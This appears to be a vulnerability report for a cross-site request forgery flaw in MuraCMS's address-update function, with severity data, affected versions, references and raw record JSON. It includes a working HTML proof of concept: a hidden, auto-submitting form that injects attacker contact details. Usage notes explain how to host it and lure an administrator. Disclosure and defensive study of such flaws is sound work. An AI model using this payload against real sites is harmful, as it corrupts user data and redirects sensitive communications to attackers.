Security Vulnerability Report
CVE-2025-55045 CVSS 7.1 HIGH

CVE-2025-55045

Published: 2026-03-18 16:16:24
Last Modified: 2026-03-20 18:10:39

Description

MuraCMS through 10.1.10 is vulnerable to cross-site request forgery (CSRF) in its update-address function. The cUsers.updateAddress handler does not validate a CSRF token, so a malicious website can forge requests that add, modify, or delete user addresses when an authenticated administrator visits a crafted page.

Successful exploitation results in unauthorized manipulation of user address information within the MuraCMS system, compromising user data integrity and organizational communications. When an authenticated administrator visits a malicious webpage containing the CSRF exploit, their browser automatically submits a hidden form that can add addresses with attacker-controlled email addresses and phone numbers, update existing addresses to redirect communications to attacker-controlled locations, or delete legitimate address records to disrupt business operations.

Consequences include misdirected sensitive communications, compromise of user privacy through injection of attacker contact information, disruption of legitimate business correspondence, and social engineering attacks via the corrupted address data.

The attack depends on the victim's browser attaching the MuraCMS session cookie to a cross-site POST. A session cookie marked SameSite=Lax or SameSite=Strict is not sent on a cross-site top-level form POST, which blunts the form-based attack even on unpatched versions, but it is a browser-side mitigation and not a substitute for server-side token validation.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:murasoftware:mura_cms:-:*:*:*:*:*:*:* - VULNERABLE
MuraCMS < 10.1.14 (the CVE description says "through 10.1.10"; the fix is referenced in the 10.1.14 release notes, so treat any version below 10.1.14 as affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-55045 CSRF PoC - MuraCMS updateAddress -->
<!DOCTYPE html>
<html>
<head>
  <title>Loading...</title>
  <style>body{display:none;}</style>
</head>
<body>
  <h1>MuraCMS updateAddress CSRF Exploit</h1>
  <!-- Auto-submit form to add malicious address -->
  <form id="csrfForm" action="[MURACMS_BASE_URL]/cUsers.updateAddress" method="POST">
    <input type="hidden" name="addressID" value="0">
    <input type="hidden" name="addressType" value="shipping">
    <input type="hidden" name="firstName" value="Attacker">
    <input type="hidden" name="lastName" value="Injected">
    <input type="hidden" name="email" value="[email protected]">
    <input type="hidden" name="phone" value="+1-555-ATTACKER">
    <input type="hidden" name="address1" value="123 Malicious St">
    <input type="hidden" name="address2" value="">
    <input type="hidden" name="city" value="AttackerCity">
    <input type="hidden" name="state" value="XX">
    <input type="hidden" name="postalCode" value="12345">
    <input type="hidden" name="country" value="US">
    <input type="hidden" name="isPrimary" value="1">
  </form>
  <script>
    // Auto-submit the CSRF form when the page loads. This is a top-level
    // navigation, so the browser replaces this page with the CMS response;
    // the redirect below therefore rarely gets a chance to run. To keep the
    // lure page on screen instead, point the form's target at a hidden iframe.
    document.getElementById('csrfForm').submit();
    // Optional: redirect after exploitation
    setTimeout(function() {
      window.location.href = 'https://www.google.com';
    }, 1000);
  </script>
</body>
</html>
<!--
Usage: host this HTML on an attacker-controlled server and lure an authenticated
MuraCMS administrator to visit the page. The form auto-submits using the admin's
session, adding or modifying address records without their knowledge. This PoC
demonstrates the lack of CSRF protection in cUsers.updateAddress.
-->

References

https://docs.murasoftware.com/v10/release-notes/ (Release Notes)
https://docs.murasoftware.com/v10/release-notes/#section-version-1014 (Release Notes, version 10.1.14)
https://www.murasoftware.com (Product)

Weakness: CWE-352 (Cross-Site Request Forgery)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-55045",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-18T16:16:23.670",
    "lastModified": "2026-03-20T18:10:39.450",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The update address CSRF vulnerability in MuraCMS through 10.1.10 allows attackers to manipulate user address information through CSRF. The vulnerable cUsers.updateAddress function lacks CSRF token validation, enabling malicious websites to forge requests that add, modify, or delete user addresses when an authenticated administrator visits a crafted webpage. Successful exploitation of the update address CSRF vulnerability results in unauthorized manipulation of user address information within the MuraCMS system, potentially compromising user data integrity and organizational communications. When an authenticated administrator visits a malicious webpage containing the CSRF exploit, their browser automatically submits a hidden form that can add malicious addresses with attacker-controlled email addresses and phone numbers, update existing addresses to redirect communications to attacker-controlled locations or deleted legitimate address records to disrupt business operations. This can lead to misdirected sensitive communications, compromise of user privacy through injection of attacker contact information, disruption of legitimate business correspondence, and potential social engineering attacks via the corrupted address data."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 4.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-352"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:murasoftware:mura_cms:-:*:*:*:*:*:*:*",
                "matchCriteriaId": "CB4646EE-1255-4B42-890A-E0B57EBFE2CE"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://docs.murasoftware.com/v10/release-notes/", "source": "[email protected]", "tags": ["Release Notes"]},
      {"url": "https://docs.murasoftware.com/v10/release-notes/#section-version-1014", "source": "[email protected]", "tags": ["Release Notes"]},
      {"url": "https://www.murasoftware.com", "source": "[email protected]", "tags": ["Product"]}
    ]
  }
}